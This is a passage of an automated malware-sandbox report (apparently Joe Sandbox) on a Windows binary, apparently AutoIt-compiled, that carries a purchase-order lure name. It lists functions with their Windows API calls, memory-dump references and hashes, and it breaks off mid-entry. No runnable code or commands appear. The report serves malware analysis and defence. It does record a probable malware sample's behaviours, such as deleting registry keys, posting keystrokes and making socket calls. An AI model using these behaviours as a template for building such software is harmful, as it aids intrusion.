                                                                                                              • Opcode Fuzzy Hash: 141fba354ed2cf796e9f381b08e1c51c20eadb5a209a28467456a499135b6fbb
                                                                                                              • Instruction Fuzzy Hash: 1E91CE716042019FD701EF15C981B6EB7E5FF88314F44881EF9969B2A2DBB8E905CB4A
                                                                                                              Function 004395BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • select.WSOCK32 ref: 00439691
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0043969E
                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004396C8
                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004396E9
                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004396F8
                                                                                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 004397AA
                                                                                                              • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0047DC00), ref: 00439765
                                                                                                                • Part of subcall function 0041D2FF: _strlen.LIBCMT ref: 0041D309
                                                                                                              • _strlen.LIBCMT ref: 00439800
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                              • String ID:
                                                                                                              • API String ID: 3480843537-0
                                                                                                              • Opcode ID: 1c4f47ab1c81ba47ffbd4ce0323c0a961e0204be91bc61015c477e44e33d3ef4
                                                                                                              • Instruction ID: 18f29bf43a2ad2862add212b4e7773552f51aade24c8d638af1fd76f3a3f2740
                                                                                                              • Opcode Fuzzy Hash: 1c4f47ab1c81ba47ffbd4ce0323c0a961e0204be91bc61015c477e44e33d3ef4
                                                                                                              • Instruction Fuzzy Hash: AA810D31504240ABC315EF65CC82E6FB7A8EF88714F004A2EF6559B2E1EBB0DD01CB96
                                                                                                              Function 0040A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __mtinitlocknum.LIBCMT ref: 0040A991
                                                                                                                • Part of subcall function 00407D7C: __FF_MSGBANNER.LIBCMT ref: 00407D91
                                                                                                                • Part of subcall function 00407D7C: __NMSG_WRITE.LIBCMT ref: 00407D98
                                                                                                                • Part of subcall function 00407D7C: __malloc_crt.LIBCMT ref: 00407DB8
                                                                                                              • __lock.LIBCMT ref: 0040A9A4
                                                                                                              • __lock.LIBCMT ref: 0040A9F0
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00496DE0,00000018,00415E7B,?,00000000,00000109), ref: 0040AA0C
                                                                                                              • EnterCriticalSection.KERNEL32(8000000C,00496DE0,00000018,00415E7B,?,00000000,00000109), ref: 0040AA29
                                                                                                              • LeaveCriticalSection.KERNEL32(8000000C), ref: 0040AA39
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                              • String ID:
                                                                                                              • API String ID: 1422805418-0
                                                                                                              • Opcode ID: 2ba090b8c7a18345a08bb690e83a880091446c60ec730c5a404c80179b9b3718
                                                                                                              • Instruction ID: bb613424b85b54d83f231774b72021fc063f6c76e149a20dc81cecc59b9b4f60
                                                                                                              • Opcode Fuzzy Hash: 2ba090b8c7a18345a08bb690e83a880091446c60ec730c5a404c80179b9b3718
                                                                                                              • Instruction Fuzzy Hash: 524105B1F003019BEB149F69DA4475ABBA0AF41324F10823EE425BB2D1D77C9861CF9E
                                                                                                              Function 00448ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00448EE4
                                                                                                              • GetDC.USER32(00000000), ref: 00448EEC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00448EF7
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00448F03
                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00448F3F
                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00448F50
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0044BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00448F8A
                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00448FAA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3864802216-0
                                                                                                              • Opcode ID: 3aa44203315e41f1f4a724a6124709c66331b48212523204849b8aee8a2b0efa
                                                                                                              • Instruction ID: 9e05e1c7ad9c697b0fd3107868a661ac32e1779f974be3c1318ed7eea0f69fae
                                                                                                              • Opcode Fuzzy Hash: 3aa44203315e41f1f4a724a6124709c66331b48212523204849b8aee8a2b0efa
                                                                                                              • Instruction Fuzzy Hash: D7318E72A00214BFEB108F54CC4AFEB3BADEF49715F044065FE09DA291DAB99841CB79
                                                                                                              Function 00450133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0045016D
                                                                                                              • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0045038D
                                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004503AB
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?), ref: 004503D6
                                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004503FF
                                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 00450421
                                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00450440
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3356174886-0
                                                                                                              • Opcode ID: 872034edc7d900d334790125ca1616a520f99a9157d1f941ab8fa96e59527238
                                                                                                              • Instruction ID: fb6d9a2b0c040ad8ca6965139b350eea3b4c23193a48c9f94b018c22093f68e3
                                                                                                              • Opcode Fuzzy Hash: 872034edc7d900d334790125ca1616a520f99a9157d1f941ab8fa96e59527238
                                                                                                              • Instruction Fuzzy Hash: 15A1F338A00616EFDB18CF68C9857BEBBB1FF04742F088166EC5497251D778AD54CB94
                                                                                                              Function 003FAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 829912e6f01f1baf506f7472922527dfa9d7fa8498d9563085a2101b9368ce6a
                                                                                                              • Instruction ID: f0b7d397050275b13d607e40414df84e069ed0caffc38c763a379fe5a7b196b8
                                                                                                              • Opcode Fuzzy Hash: 829912e6f01f1baf506f7472922527dfa9d7fa8498d9563085a2101b9368ce6a
                                                                                                              • Instruction Fuzzy Hash: DB718DB1900609EFCB05CF98CC89ABEBB78FF85314F148159FA19AB251C734AA51CF65
                                                                                                              Function 00442230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 0044225A
                                                                                                              • _memset.LIBCMT ref: 00442323
                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00442368
                                                                                                                • Part of subcall function 003E936C: __swprintf.LIBCMT ref: 003E93AB
                                                                                                                • Part of subcall function 003E936C: __itow.LIBCMT ref: 003E93DF
                                                                                                                • Part of subcall function 003FC6F4: _wcscpy.LIBCMT ref: 003FC717
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0044242F
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0044243E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                              • String ID: @
                                                                                                              • API String ID: 4082843840-2766056989
                                                                                                              • Opcode ID: 25a8ae4a3fe90f7be1c66e0b72379d08625883b6e72bee0f0016177889af6153
                                                                                                              • Instruction ID: 11298f79b7bb6c5b5a0d6d197f08bc7de83acf9ca9690253026baa7a25185f70
                                                                                                              • Opcode Fuzzy Hash: 25a8ae4a3fe90f7be1c66e0b72379d08625883b6e72bee0f0016177889af6153
                                                                                                              • Instruction Fuzzy Hash: 56719F74A006299FDF05EFA5C5819AEB7F5FF48310F10855AE845AB391CB74AD40CB94
                                                                                                              Function 00423DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetParent.USER32(?), ref: 00423DE7
                                                                                                              • GetKeyboardState.USER32(?), ref: 00423DFC
                                                                                                              • SetKeyboardState.USER32(?), ref: 00423E5D
                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00423E8B
                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00423EAA
                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00423EF0
                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00423F13
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                              • String ID:
                                                                                                              • API String ID: 87235514-0
                                                                                                              • Opcode ID: 0f92398b0790a3f7e0e82493f34ac45ed07ba525576c0ba31f89a94a40b45741
                                                                                                              • Instruction ID: fa63be19b8bd96d8f67619561e1ea609a66fa311abddba109834ffd307550752
                                                                                                              • Opcode Fuzzy Hash: 0f92398b0790a3f7e0e82493f34ac45ed07ba525576c0ba31f89a94a40b45741
                                                                                                              • Instruction Fuzzy Hash: 5951F3A0B143E53DFB364A24AC05BB77EB95B06305F48448AE0D9869C3D2DCAEC8D759
                                                                                                              Function 00423BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetParent.USER32(00000000), ref: 00423C02
                                                                                                              • GetKeyboardState.USER32(?), ref: 00423C17
                                                                                                              • SetKeyboardState.USER32(?), ref: 00423C78
                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00423CA4
                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00423CC1
                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00423D05
                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00423D26
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                              • String ID:
                                                                                                              • API String ID: 87235514-0
                                                                                                              • Opcode ID: 78d8662ca753a5c32df9bdc1afea5408c6ccc8ae18c27e116e2ef794eff4a4dc
                                                                                                              • Instruction ID: f2931b5da700998fe3f9cbf14b42aaa636316590432212e0f0b77c221f002b14
                                                                                                              • Opcode Fuzzy Hash: 78d8662ca753a5c32df9bdc1afea5408c6ccc8ae18c27e116e2ef794eff4a4dc
                                                                                                              • Instruction Fuzzy Hash: F45137A17143E13DFB328B259C05B77BEB8AB06305F48848AF0C5565C3D29CEE84E758
                                                                                                              Function 00443D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00443DA1
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00443DCB
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00443E80
                                                                                                                • Part of subcall function 00443D72: RegCloseKey.ADVAPI32(?), ref: 00443DE8
                                                                                                                • Part of subcall function 00443D72: FreeLibrary.KERNEL32(?), ref: 00443E3A
                                                                                                                • Part of subcall function 00443D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00443E5D
                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00443E25
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 395352322-0
                                                                                                              • Opcode ID: bbdcc3a87ba496bbc728462069ae843f5fe608fa2bdfdedd01b71f4818dab618
                                                                                                              • Instruction ID: 7d6f24bf670aaa6cbb98c021c1fb5ef8bfbd62ffd887a6ad8a4a6df4f1a9cc61
                                                                                                              • Opcode Fuzzy Hash: bbdcc3a87ba496bbc728462069ae843f5fe608fa2bdfdedd01b71f4818dab618
                                                                                                              • Instruction Fuzzy Hash: A0311AB1E01109BFEB149F91DC85AFFB7BCEF08705F10016AE512A2250E7B49F499BA5
                                                                                                              Function 00448FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00448FE7
                                                                                                              • GetWindowLongW.USER32(00D4E998,000000F0), ref: 0044901A
                                                                                                              • GetWindowLongW.USER32(00D4E998,000000F0), ref: 0044904F
                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00449081
                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004490AB
                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004490BC
                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004490D6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 2178440468-0
                                                                                                              • Opcode ID: bea5dc7d0b604c9462d14dcdcffa984ba9d2f8742781542eafe7b437b36b56a7
                                                                                                              • Instruction ID: 10039551bf224fb0f169e7c07a4c388b8a32daf60094750845882c7bcc6493a6
                                                                                                              • Opcode Fuzzy Hash: bea5dc7d0b604c9462d14dcdcffa984ba9d2f8742781542eafe7b437b36b56a7
                                                                                                              • Instruction Fuzzy Hash: 4B311534B002159FEB20CF58DC84F6677A5FB4A754F144166F619CB2B2CBB5AC40EB49
                                                                                                              Function 004208AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004208F2
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00420918
                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0042091B
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00420939
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00420942
                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00420967
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00420975
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761583154-0
                                                                                                              • Opcode ID: f8c2cc13a069ebbea2f1a7981c387869adb2e65f7e884c97e348f22dca486dcd
                                                                                                              • Instruction ID: fac49f6a4c2f002c9b5d6f5c10c6d22820bfde9d878786e694011458e33290f2
                                                                                                              • Opcode Fuzzy Hash: f8c2cc13a069ebbea2f1a7981c387869adb2e65f7e884c97e348f22dca486dcd
                                                                                                              • Instruction Fuzzy Hash: 7021A9B6B01219AF9B109F78DC88DBB73ECEF09360B408126F915DB252E674EC45C769
                                                                                                              Function 00422472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __wcsnicmp
                                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                              • API String ID: 1038674560-2734436370
                                                                                                              • Opcode ID: 2d115ba8308fee44ce13eb29c7d7216d157161e99e83f606e4eaade9279217c8
                                                                                                              • Instruction ID: bf87036719c71e2f4c384ba3f8707fcf63156b3816d89439069212bc894cc527
                                                                                                              • Opcode Fuzzy Hash: 2d115ba8308fee44ce13eb29c7d7216d157161e99e83f606e4eaade9279217c8
                                                                                                              • Instruction Fuzzy Hash: 2D214B3230413176C321BA24AE02FB77398DF55304FA0842BF54AA7181E7AD9982C29D
                                                                                                              Function 00420986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004209CB
                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004209F1
                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004209F4
                                                                                                              • SysAllocString.OLEAUT32 ref: 00420A15
                                                                                                              • SysFreeString.OLEAUT32 ref: 00420A1E
                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00420A38
                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00420A46
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761583154-0
                                                                                                              • Opcode ID: ba0414992a03cf6929a29808a4edff3f59d047d7055d4fb6b43b7ca38fe6cf4b
                                                                                                              • Instruction ID: 3abc2051ec73ac6b8b686a978339516bdc25d60674f282ee210b1c013a2d912c
                                                                                                              • Opcode Fuzzy Hash: ba0414992a03cf6929a29808a4edff3f59d047d7055d4fb6b43b7ca38fe6cf4b
                                                                                                              • Instruction Fuzzy Hash: 67214775700214AFDB109FA8DC89DAB77ECEF593607848126F909CB261EA74EC418769
                                                                                                              Function 0044A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003FD1BA
